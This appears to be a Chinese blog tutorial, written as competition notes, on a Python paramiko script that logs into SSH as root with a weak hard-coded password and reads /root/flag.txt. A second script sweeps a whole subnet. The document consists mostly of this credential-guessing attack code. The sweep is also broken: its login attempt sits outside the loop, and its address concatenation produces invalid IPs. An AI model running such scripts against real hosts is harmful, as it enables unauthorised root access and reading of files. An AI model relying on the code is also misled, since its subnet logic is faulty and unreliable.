编写Python渗透测试工具之SSH弱口令读取Flag

本文将讲述如何使用Python编写SSH弱口令读取文件Flag内容

安装Paramiko模块

paramiko模块，基于SSH用于连接远程服务器并执行相关操作。

编写脚本

import paramiko

# 创建ssh连接
sshc = paramiko.SSHClient()

# 第一次连接提示是否继续远程连接，默认勾选yes
sshc.set_missing_host_key_policy(paramiko.AutoAddPolicy())

ip = "172.20.89.123"

try:
    try:
        sshc.connect(ip,22,'root','1234567',timeout=1)

        file = sshc.exec_command("cat /root/flag.txt")[1].readlines()

        print(file)
    except:
        print("SSH连接失败，请检查端口 用户名或密码")
except:
    print("time out")

这样，我们就可以通过连接SSH执行cat命令查看flag了。

这个脚本一般在比赛用的笔记多，记录一下。

当然，如果比赛的话，我们也可以用for循环把所有ip遍历的查看flag

import paramiko

# 创建ssh连接
sshc = paramiko.SSHClient()

# 第一次连接提示是否继续远程连接，默认勾选yes
sshc.set_missing_host_key_policy(paramiko.AutoAddPolicy())

ip = "172.20.89.1"

for i in range(1,224):
    host = ip+str(i)

    print(host)

try:
    try:
        sshc.connect(host,22,'root','1234567',timeout=1)

        file = sshc.exec_command("cat /root/flag.txt")[1].readlines()

        print(file)
    except:
        print("SSH连接失败，请检查端口 用户名或密码")
except:
    print("time out")

得到flag结果如下

这样就方便我们获取某个Linux主机上的flag了。